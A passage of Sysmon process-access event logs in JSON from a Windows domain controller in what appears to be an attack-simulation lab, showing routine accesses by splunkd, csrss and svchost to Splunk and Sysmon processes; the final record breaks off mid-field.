{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6211,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.924\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-11FD-5F25-0000-0010451B0900}\r\nTargetProcessId: 4876\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.924","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-11FD-5F25-0000-0010451B0900}","TargetProcessId":"4876","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6212,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.924\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11FD-5F25-0000-0010451B0900}\r\nTargetProcessId: 4876\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.924","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11FD-5F25-0000-0010451B0900}","TargetProcessId":"4876","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6213,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.924\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.924","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6214,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.924\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.924","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6215,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.924\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.924","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6216,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.924\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.924","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6217,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.924\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.924","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6218,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.924\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:57.924","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6219,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:57.924\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 